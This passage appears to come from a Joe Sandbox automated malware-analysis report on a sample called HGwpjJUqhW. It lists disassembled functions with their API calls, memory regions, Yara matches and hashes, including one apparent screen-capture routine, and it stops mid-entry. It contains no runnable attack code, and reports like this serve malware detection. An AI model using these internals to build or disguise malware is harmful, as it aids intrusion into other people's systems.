                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3340475617-0
                                                                                                                            • Opcode ID: d8c3e0d125600cab4e22fd1e0cbee17f0e5d3082f527410c0cafce037ff4f570
                                                                                                                            • Instruction ID: e42b6ef41525683d1057cf81423d0ae273d15367fb101d5b4355789b168becb9
                                                                                                                            • Opcode Fuzzy Hash: d8c3e0d125600cab4e22fd1e0cbee17f0e5d3082f527410c0cafce037ff4f570
                                                                                                                            • Instruction Fuzzy Hash: 5701C8F5900B449FE3209F7AD881B97BAE9EB85354F104C2ED5AE83301D630A9048F60
                                                                                                                            Function 03623660 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03623667
                                                                                                                            • _free.LIBCMT ref: 0362369C
                                                                                                                              • Part of subcall function 0362F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03633E4C,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 0362F64F
                                                                                                                              • Part of subcall function 0362F639: GetLastError.KERNEL32(00000000,?,03633E4C,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000), ref: 0362F661
                                                                                                                            • _malloc.LIBCMT ref: 036236D7
                                                                                                                            • _memset.LIBCMT ref: 036236E5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3340475617-0
                                                                                                                            • Opcode ID: 1fa333d13e598a9a3f9162cd18b7b95caff6bbaded29d3d1f8dfa77804d5cd1c
                                                                                                                            • Instruction ID: 96d1d3ab4a4873ca9051ce9dc172536029c174235f1e92abf31c39613ccdce84
                                                                                                                            • Opcode Fuzzy Hash: 1fa333d13e598a9a3f9162cd18b7b95caff6bbaded29d3d1f8dfa77804d5cd1c
                                                                                                                            • Instruction Fuzzy Hash: 1701C4B5900B049FE360DF7A9881B97BAE9EB85214F15482EE5AE8B301D634A8158F24
                                                                                                                            Function 02886EEE Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 02886F08
                                                                                                                              • Part of subcall function 02886E5A: __FF_MSGBANNER.LIBCMT ref: 02886E73
                                                                                                                              • Part of subcall function 02886E5A: __NMSG_WRITE.LIBCMT ref: 02886E7A
                                                                                                                            • std::exception::exception.LIBCMT ref: 02886F3D
                                                                                                                            • std::exception::exception.LIBCMT ref: 02886F57
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 02886F68
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2388904642-0
                                                                                                                            • Opcode ID: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                                            • Instruction ID: fc04166981fb44731eadcc56615230745e672efc00e8bdbd07cdc6c9219650f8
                                                                                                                            • Opcode Fuzzy Hash: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                                            • Instruction Fuzzy Hash: 56F0A43E4042A9A6DB05FB68CC84AAD7AFFEB41714F640059D428DA0D1FBB1DAC1CB56
                                                                                                                            Function 034AF0C6 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 034AF0E0
                                                                                                                              • Part of subcall function 034AF032: __FF_MSGBANNER.LIBCMT ref: 034AF04B
                                                                                                                              • Part of subcall function 034AF032: __NMSG_WRITE.LIBCMT ref: 034AF052
                                                                                                                            • std::exception::exception.LIBCMT ref: 034AF115
                                                                                                                            • std::exception::exception.LIBCMT ref: 034AF12F
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 034AF140
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2388904642-0
                                                                                                                            • Opcode ID: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                                            • Instruction ID: 04d7a93dbe51c8da1370dcd0eda14fb668393a7da450af7a02e30f5850d55e47
                                                                                                                            • Opcode Fuzzy Hash: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                                            • Instruction Fuzzy Hash: 86F04435800B14AFDB14EB99DC60ABF7AA8EB10244F94402EE800AE180CB308A06CB54
                                                                                                                            Function 02C36490 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02C31420: HeapFree.KERNEL32(?,00000000,?,?,?,02C340B1,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C3143D
                                                                                                                              • Part of subcall function 02C31420: _free.LIBCMT ref: 02C31459
                                                                                                                            • HeapDestroy.KERNEL32(00000000), ref: 02C364A3
                                                                                                                            • HeapCreate.KERNEL32(?,?,?), ref: 02C364B5
                                                                                                                            • _free.LIBCMT ref: 02C364C5
                                                                                                                            • HeapDestroy.KERNEL32 ref: 02C364F2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Destroy_free$CreateFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4097506873-0
                                                                                                                            • Opcode ID: dbe69951c95950d3cf55ef2770884d2e735f4f31497cb011b51e9e66fe431d02
                                                                                                                            • Instruction ID: c0c61f0f05275fce3f615f6ceeb38dae38bfb3ded082e67a4b40fa700768304c
                                                                                                                            • Opcode Fuzzy Hash: dbe69951c95950d3cf55ef2770884d2e735f4f31497cb011b51e9e66fe431d02
                                                                                                                            • Instruction Fuzzy Hash: 69F014B9900702ABE7219F25E808B13B7F8BF84764F248918E85997240DB34F8658BE0
                                                                                                                            Function 0362CD80 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03621420: HeapFree.KERNEL32(?,00000000,?,?,?,036240B1,?,00000000,03624039,?,74DEDFA0,03623648), ref: 0362143D
                                                                                                                              • Part of subcall function 03621420: _free.LIBCMT ref: 03621459
                                                                                                                            • HeapDestroy.KERNEL32(00000000), ref: 0362CD93
                                                                                                                            • HeapCreate.KERNEL32(?,?,?), ref: 0362CDA5
                                                                                                                            • _free.LIBCMT ref: 0362CDB5
                                                                                                                            • HeapDestroy.KERNEL32 ref: 0362CDE2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Destroy_free$CreateFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4097506873-0
                                                                                                                            • Opcode ID: da8f6167f1729e14d668317b64dc77a604be607314adb8e61b0d2d2d0e0a5eaa
                                                                                                                            • Instruction ID: 64bb298d37355f375c09e0ddec12195d8822f0e4db10ff3b64bf95a5944400a9
                                                                                                                            • Opcode Fuzzy Hash: da8f6167f1729e14d668317b64dc77a604be607314adb8e61b0d2d2d0e0a5eaa
                                                                                                                            • Instruction Fuzzy Hash: 76F014B9500B12ABD310EF24E918B57FBB8FF84610F258918E8598BA44DB34E851CFA0
                                                                                                                            Function 034A980F Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 302COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 034A997F
                                                                                                                              • Part of subcall function 034AF032: __FF_MSGBANNER.LIBCMT ref: 034AF04B
                                                                                                                              • Part of subcall function 034AF032: __NMSG_WRITE.LIBCMT ref: 034AF052
                                                                                                                            • _memcpy_s.LIBCMT ref: 034A9B42
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc_memcpy_s
                                                                                                                            • String ID: &
                                                                                                                            • API String ID: 3561290194-3042966939
                                                                                                                            • Opcode ID: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                                                            • Instruction ID: 3cffc98a2bff64037f73accde5010aa569f40fccaf9d5034111c1902ad5f48ed
                                                                                                                            • Opcode Fuzzy Hash: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                                                            • Instruction Fuzzy Hash: 72C153F1A006199FDB24CF59CCC0B9AB7B8EF58300F1485AED6199B341D774AA85CF58
                                                                                                                            Function 034AC2CF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset_wcsrchr
                                                                                                                            • String ID: D
                                                                                                                            • API String ID: 1675014779-2746444292
                                                                                                                            • Opcode ID: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                                            • Instruction ID: 80e26dc7400889838edcc8ad0de3a3f3c511c6eb81a25a65c7f203ac6a370ab5
                                                                                                                            • Opcode Fuzzy Hash: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                                            • Instruction Fuzzy Hash: D131F4729402187BE720DBA49C89FEB776CEB54710F14012AFA0AAE1C1DA759906C6E9
                                                                                                                            Function 0362B19D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0362BC70: GetDesktopWindow.USER32 ref: 0362BC8F
                                                                                                                              • Part of subcall function 0362BC70: GetDC.USER32(00000000), ref: 0362BC9C
                                                                                                                              • Part of subcall function 0362BC70: CreateCompatibleDC.GDI32(00000000), ref: 0362BCA2
                                                                                                                              • Part of subcall function 0362BC70: GetDC.USER32(00000000), ref: 0362BCAD
                                                                                                                              • Part of subcall function 0362BC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 0362BCBA
                                                                                                                              • Part of subcall function 0362BC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 0362BCC2
                                                                                                                              • Part of subcall function 0362BC70: ReleaseDC.USER32(00000000,00000000), ref: 0362BCD3
                                                                                                                              • Part of subcall function 0362BC70: GetSystemMetrics.USER32(0000004C), ref: 0362BD78
                                                                                                                              • Part of subcall function 0362BC70: GetSystemMetrics.USER32(0000004D), ref: 0362BD8D
                                                                                                                              • Part of subcall function 0362BC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0362BDA6
                                                                                                                              • Part of subcall function 0362BC70: SelectObject.GDI32(?,00000000), ref: 0362BDB4
                                                                                                                              • Part of subcall function 0362BC70: SetStretchBltMode.GDI32(?,00000003), ref: 0362BDC0
                                                                                                                              • Part of subcall function 0362BC70: GetSystemMetrics.USER32(0000004F), ref: 0362BDCD
                                                                                                                              • Part of subcall function 0362BC70: GetSystemMetrics.USER32(0000004E), ref: 0362BDE0
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                            • _memset.LIBCMT ref: 0362B1E1
                                                                                                                            • swprintf.LIBCMT ref: 0362B204
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
                                                                                                                            • String ID: %s %s
                                                                                                                            • API String ID: 1028806752-581060391
                                                                                                                            • Opcode ID: 6178acec4da6cbb117076893e01d9448d0763423558c0d2da636fed1a289f94e
                                                                                                                            • Instruction ID: 941279955c217821ae40c1b10dc7d2ac6a8a9440ed491e9d4d7fb9c0bf4ec436
                                                                                                                            • Opcode Fuzzy Hash: 6178acec4da6cbb117076893e01d9448d0763423558c0d2da636fed1a289f94e
                                                                                                                            • Instruction Fuzzy Hash: F3210776A04710ABD310EB15DC81E6FBBE8EFD9710F05052DF4895B241E6B1D904CBA7
                                                                                                                            Function 03629100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 03629115
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF4E
                                                                                                                              • Part of subcall function 0362EF39: __CxxThrowException@8.LIBCMT ref: 0362EF63
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF74
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 03629128
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                            • String ID: string too long
                                                                                                                            • API String ID: 963545896-2556327735
                                                                                                                            • Opcode ID: 5be508bc692a2da11700b8e2538278f581edb822a4c5d5b2584673af9c6db63e
                                                                                                                            • Instruction ID: 9cb17a4b303a237e6af3bf4834007b3c40aa303a46b016c58bfca1e09a4f7082
                                                                                                                            • Opcode Fuzzy Hash: 5be508bc692a2da11700b8e2538278f581edb822a4c5d5b2584673af9c6db63e
                                                                                                                            • Instruction Fuzzy Hash: A111E935700B608BC321CA2DE808A17BFE9DBD6710F160A6EE591CB741C771D410CBA5
                                                                                                                            Function 036293F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0362941D
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0362944A
                                                                                                                            Strings
                                                                                                                            • invalid string position, xrefs: 03629445
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                            • String ID: invalid string position
                                                                                                                            • API String ID: 3614006799-1799206989
                                                                                                                            • Opcode ID: a5788bba409d342b0341ebd608fd686160e26e125527a723634e7f653b635b54
                                                                                                                            • Instruction ID: 2b5e1b4059f637e94f9e1be7021f38e225574d5052efaa5a94b023fc345c909c
                                                                                                                            • Opcode Fuzzy Hash: a5788bba409d342b0341ebd608fd686160e26e125527a723634e7f653b635b54
                                                                                                                            • Instruction Fuzzy Hash: F40126336007205BC324EE68C880B9AFBD9AF81720F164A3DE5529F680D772E950CBE4
                                                                                                                            Function 02886FA1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __output_l.LIBCMT ref: 02886FFC
                                                                                                                              • Part of subcall function 028870E4: __getptd_noexit.LIBCMT ref: 028870E4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit__output_l
                                                                                                                            • String ID: B
                                                                                                                            • API String ID: 2141734944-1255198513
                                                                                                                            • Opcode ID: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                                                                            • Instruction ID: 3cf38d7283005a941b4309dead69d7fdaa71fb35e15c03ac5dd3304fdab03949
                                                                                                                            • Opcode Fuzzy Hash: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                                                                            • Instruction Fuzzy Hash: 4101877A90425D9BEF00AFA8CC00BEEBBB9FB04364F100165E924E6281E7749500CBB2
                                                                                                                            Function 034AF179 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __output_l.LIBCMT ref: 034AF1D4
                                                                                                                              • Part of subcall function 034AF2DA: __getptd_noexit.LIBCMT ref: 034AF2DA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit__output_l
                                                                                                                            • String ID: B
                                                                                                                            • API String ID: 2141734944-1255198513
                                                                                                                            • Opcode ID: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                                                                            • Instruction ID: c3381635c56eef19766f4d2b6cec93033e09c9dbfea035f29709b790cff329ad
                                                                                                                            • Opcode Fuzzy Hash: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                                                                            • Instruction Fuzzy Hash: AD016175D002099FDF10DFA9CC41AEEBBB4EB04364F14411AE824AA280D7749905CBB9
                                                                                                                            Function 03629570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0362957F
                                                                                                                              • Part of subcall function 0362EF86: std::exception::exception.LIBCMT ref: 0362EF9B
                                                                                                                              • Part of subcall function 0362EF86: __CxxThrowException@8.LIBCMT ref: 0362EFB0
                                                                                                                              • Part of subcall function 0362EF86: std::exception::exception.LIBCMT ref: 0362EFC1
                                                                                                                            • _memmove.LIBCMT ref: 036295B5
                                                                                                                            Strings
                                                                                                                            • invalid string position, xrefs: 0362957A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                            • String ID: invalid string position
                                                                                                                            • API String ID: 1785806476-1799206989
                                                                                                                            • Opcode ID: ed25437e7a8b00492c310d3cdf296206fb8cbba77b61dea343f1812fe2f6b963
                                                                                                                            • Instruction ID: c220123c09e4b81c11d15b8e177b3ef32ce595f4c75d1f9aa1d44f3af7f339a0
                                                                                                                            • Opcode Fuzzy Hash: ed25437e7a8b00492c310d3cdf296206fb8cbba77b61dea343f1812fe2f6b963
                                                                                                                            • Instruction Fuzzy Hash: AB01A731700B214FD325CE2CED9461BBBE79BC5640F2A492CD081DB749D771DC524BA4
                                                                                                                            Function 0362D1C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0362D1D4
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF4E
                                                                                                                              • Part of subcall function 0362EF39: __CxxThrowException@8.LIBCMT ref: 0362EF63
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF74
                                                                                                                            • _memmove.LIBCMT ref: 0362D20D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 1785806476-3788999226
                                                                                                                            • Opcode ID: b46990320be02e5848981868a952af6c9bbcad042ba6c2ce62f485940f91049f
                                                                                                                            • Instruction ID: bac469e1f0ca58d0f2266af7cf68026d6cc74f398465a74f70f4000b9cfedac8
                                                                                                                            • Opcode Fuzzy Hash: b46990320be02e5848981868a952af6c9bbcad042ba6c2ce62f485940f91049f
                                                                                                                            • Instruction Fuzzy Hash: D401D876A407115FCB00EF6DF891E6E7B98E642250B4A563EEC32D760CE771E8448B90
                                                                                                                            Function 03628430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 03628443
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF4E
                                                                                                                              • Part of subcall function 0362EF39: __CxxThrowException@8.LIBCMT ref: 0362EF63
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF74
                                                                                                                            • _memmove.LIBCMT ref: 0362846E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 1785806476-3788999226
                                                                                                                            • Opcode ID: c3382e288381ac5a5ce59c567d5d2e8a1bc8280252e685e8c1a5acc86903681e
                                                                                                                            • Instruction ID: 1c82efd048486658533347f4a1efb6ce0e9a91bcca7fdb3853f0a9c2d2ffefb6
                                                                                                                            • Opcode Fuzzy Hash: c3382e288381ac5a5ce59c567d5d2e8a1bc8280252e685e8c1a5acc86903681e
                                                                                                                            • Instruction Fuzzy Hash: 9201A2B16007159FCB24DEA9DC91D2BBBE8EF54214319493DE856CB744E631F800CB61
                                                                                                                            Function 02893414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallFrame@12Setting__getptd
                                                                                                                            • String ID: j
                                                                                                                            • API String ID: 3454690891-2137352139
                                                                                                                            • Opcode ID: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                                            • Instruction ID: 485dd21f4a90035941cd388f95717001b6757ca0dd6209e30ca5a99883d2a0f8
                                                                                                                            • Opcode Fuzzy Hash: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                                            • Instruction Fuzzy Hash: E5115B7D800259EBCF12EF58C5443ACBB71BF16718F1A8089E459AB682C3746991CFD2
                                                                                                                            Function 02C437C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02C432AE: __getptd.LIBCMT ref: 02C432B4
                                                                                                                              • Part of subcall function 02C432AE: __getptd.LIBCMT ref: 02C432C4
                                                                                                                            • __getptd.LIBCMT ref: 02C437D8
                                                                                                                              • Part of subcall function 02C3990F: __getptd_noexit.LIBCMT ref: 02C39912
                                                                                                                              • Part of subcall function 02C3990F: __amsg_exit.LIBCMT ref: 02C3991F
                                                                                                                            • __getptd.LIBCMT ref: 02C437E6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
